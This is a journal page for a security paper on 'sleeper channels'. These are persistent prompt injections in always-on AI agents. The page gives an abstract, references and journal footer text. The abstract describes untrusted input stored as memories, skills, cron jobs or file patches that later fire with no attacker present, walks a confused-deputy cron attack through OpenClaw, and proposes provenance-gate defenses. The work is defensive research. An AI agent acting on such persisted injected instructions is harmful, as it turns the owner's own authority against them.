Sleeper Channels and Provenance Gates: Persistent Prompt Injection in Always-on Autonomous AI Agents

Narek Maloyan; Dmitry Namiot

Sleeper Channels and Provenance Gates: Persistent Prompt Injection in Always-on Autonomous AI Agents

Narek Maloyan, Dmitry Namiot

Abstract

Always-on AI agents (OpenClaw, Hermes Agent) run as a single persistent process under the owner’s identity, folding messaging, memory, self-authored skills, scheduling, and shell into one authority boundary. This configuration opens what we call sleeper channels: an untrusted input to one surface persists as a memory, skill, scheduled job, or filesystem patch, then fires later through a different surface with no attacker present. Two independent axes define the class: persistence substrate and firing-separation. We walk a confused-deputy cron attack endto-end through OpenClaw at a pinned commit. The defense is tiered (D1, D2, D3), and D2 carries a soundness theorem against seven named deployment invariants. D2 keys on a canonical action-instance digest with one-shot owner attestations, defeating paraphrase laundering, multi-input grant reuse, and replay. A companion artifact ships the gate, a static audit over the vendored source, and a runtime adapter realising five of the ten mediation hooks (H1, H2, H3, H6, H9) around the cron path (42 tests, Node ≥ 20, at github.com/maloyan/sleeper-channels). Empirical evaluation is preregistered as follow-on.

Full Text:

PDF

References

“OpenClaw: Personal AI assistant runtime,” https://github.com/openclaw/openclaw, commit

f53e789caf565e60ba29cb9751829b1b6, 2026-

-27, 2026.

Nous Research, “Hermes Agent,” https://github.com/nousresearch/hermes-agent, commit

d75dea5a86aec599b1e081f8bbe9170bd3f964, 2026-04-27; release v0.11.0, 2026-04-23, 2026.

K. Greshake, S. Abdelnabi, S. Mishra, C. Endres, T. Holz, and M. Fritz,

“Not what you’ve signed up for: Compromising real-world LLMintegrated applications with indirect prompt injection,” in Proc. 16th ACM Workshop on Artificial Intelligence and Security (AISec), 2023, arXiv:2302.12173.

E. Debenedetti, J. Zhang, M. Balunovic, L. Beurer-Kellner, M. Fischer,

and F. Tramer, “AgentDojo: A dynamic environment to evaluate prompt `

injection attacks and defenses for LLM agents,” in Advances in Neural Information Processing Systems, Datasets and Benchmarks Track, 2024, arXiv:2406.13352.

S. S. Srivastava, “MemoryGraft: Persistent compromise of LLM agents via poisoned experience retrieval,” arXiv:2512.16962, Dec. 2025.

E. Hubinger et al., “Sleeper agents: Training deceptive LLMs that persist through safety training,” arXiv:2401.05566, Jan. 2024.

N. Hardy, “The confused deputy (or why capabilities might have been

invented),” ACM SIGOPS Operating Systems Review, vol. 22, no. 4, pp. 36–38, 1988.

M. S. Miller, “Robust composition: Towards a unified approach to access control and concurrency control,” Ph.D. dissertation, Johns Hopkins University, 2006.

OpenClaw maintainers, “OpenClaw threat model v1.0 (MITRE ATLAS),” docs/security/THREAT-MODEL-ATLAS.md, OpenClaw repository at commit 3120401f53e789caf565e60ba29cb9751829b1b6, last updated 2026-02-04, 2026.

Anonymous community contributor, “Feature: Runtime prompt injection defenses,” Upstream issue (date, handle, and number anonymized for double-blind review), declined upstream, 2026.

F. Perez and I. Ribeiro, “Ignore previous prompt: Attack techniques for language models,” arXiv:2211.09527, 2022.

S. Toyer, O. Watkins, E. A. Mendes, J. Svegliato, L. Bailey, T. Wang,

I. Ong, K. Elmaaroufi, P. Abbeel, T. Darrell, A. Ritter, and S. Russell, “Tensor Trust: Interpretable prompt injection attacks from an online game,” arXiv:2311.01011, 2023.

H. Zhang, J. Huang, K. Mei, Y. Yao, Z. Wang, C. Zhan, H. Wang, and Y. Zhang, “Agent security bench (ASB): Formalizing and benchmarking attacks and defenses in LLM-based agents,” arXiv:2410.02644, 2024.

Q. Zhan, Z. Liang, Z. Ying, and D. Kang, “InjecAgent: Benchmarking indirect prompt injections in tool-integrated large language model agents,” Findings of ACL, 2024.

Z. Chen, Z. Xiang, C. Xiao, D. Song, and B. Li, “AgentPoison: Redteaming LLM agents via poisoning memory or knowledge bases,” Proc.

NeurIPS, 2024.

W. Zou, R. Geng, B. Wang, and J. Jia, “PoisonedRAG: Knowledge corruption attacks to retrieval-augmented generation of large language models,” Proc. USENIX Security Symposium, 2024.

M. Nasr et al., “The attacker moves second: Stronger adaptive attacks bypass defenses against LLM jailbreaks and prompt injections,”

arXiv:2510.09023, Oct. 2025.

N. Carlini, M. Nasr, C. A. Choquette-Choo, M. Jagielski, I. Gao, A. Awadalla, P. W. Koh, D. Ippolito, K. Lee, F. Tramer, and L. Schmidt, “Are aligned neural networks adversarially aligned?” Proc. NeurIPS, 2024.

J. H. Saltzer and M. D. Schroeder, “The protection of information in computer systems,” Proceedings of the IEEE, vol. 63, no. 9, pp. 1278– 1308, 1975.

M. S. Miller, K.-P. Yee, and J. Shapiro, “Capability myths demolished,” in Tech. Rep. SRL2003-02. Johns Hopkins Univ. Systems Research Laboratory, 2003.

H. M. Levy, Capability-based computer systems. Digital Press, 1984.

Meta AI Security, “Agents rule of two: A practical approach to AI agent security,” Tech. blog, Oct. 2025.

D. E. Denning, “A lattice model of secure information flow,” Communications of the ACM, vol. 19, no. 5, pp. 236–243, 1976.

L. Wall, T. Christiansen, and J. Orwant, Programming Perl, 3rd ed. O’Reilly, 2000.

G. E. Suh, J. W. Lee, D. Zhang, and S. Devadas, “Secure program execution via dynamic information flow tracking,” in Proc. 11th Int. Conf. Architectural Support for Programming Languages and Operating Systems (ASPLOS), 2004, pp. 85–96.

W. Enck, P. Gilbert, S. Han, V. Tendulkar, B.-G. Chun, L. P. Cox, J. Jung, P. McDaniel, and A. N. Sheth, “TaintDroid: An informationflow tracking system for realtime privacy monitoring on smartphones,” in Proc. 9th USENIX Symp. Operating Systems Design and Implementation (OSDI), 2010, pp. 393–407.

E. J. Schwartz, T. Avgerinos, and D. Brumley, “All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask),” in Proc. IEEE Symp. Security and Privacy (S&P), 2010, pp. 317–331.

M. Costa et al., “Securing AI agents with information-flow control,” arXiv:2505.23643, 2025.

E. Debenedetti, I. Shumailov, T. Fan, J. Hayes, N. Carlini, D. Fabian, C. Kern, C. Shi, F. Tramer, and A. Terzis, “Defeating prompt injections ` by design,” arXiv:2503.18813, 2025.

M. Surbatovich, J. Aljuraidan, L. Bauer, A. Das, and L. Jia, “Some recipes can do more than spoil your appetite: Analyzing the security and privacy risks of IFTTT recipes,” in Proc. 26th Int. Conf. World Wide Web (WWW), 2017, pp. 1501–1510.

Q. Wang, W. U. Hassan, A. Bates, and C. A. Gunter, “Fear and logging in the Internet of Things,” in Proc. NDSS, 2018.

OWASP Foundation, “Agentic Security Initiative,” https://genai.owasp.org/initiatives/agentic-security-initiative/, accessed Apr. 2026.

Z. Deng, Y. Guo, C. Han, W. Ma, J. Xiong, S. Wen, and Y. Xiang, “AI agents under threat: A survey of key security challenges and future pathways,” arXiv:2406.02630, 2025.

F. He, T. Zhu, D. Ye, B. Liu, W. Zhou, and P. S. Yu, “The emerged security and privacy of LLM agent: A survey with case studies,” arXiv:2407.19354, 2024.

Z. Zhong, Z. Huang, A. Wettig, and D. Chen, “Poisoning retrieval corpora by injecting adversarial passages,” in Proc. EMNLP, 2023.

Trusted Computing Group, “TPM 2.0 library specification, part 1: Architecture,” Specification Version 1.59, 2019.

Y. Liu, Y. Jia, R. Geng, J. Jia, and N. Z. Gong, “Formalizing and benchmarking prompt injection attacks and defenses,” in Proc. 33rd USENIX Security Symposium, 2024, arXiv:2310.12815.

C. Collberg and T. A. Proebsting, “Repeatability in computer systems

research,” in Communications of the ACM, vol. 59, no. 3, 2016, pp. 62–69.

Refbacks

There are currently no refbacks.

Abava Кибербезопасность Monetec 2026 СНЭ

ISSN: 2307-8162

International Journal of Open Information Technologies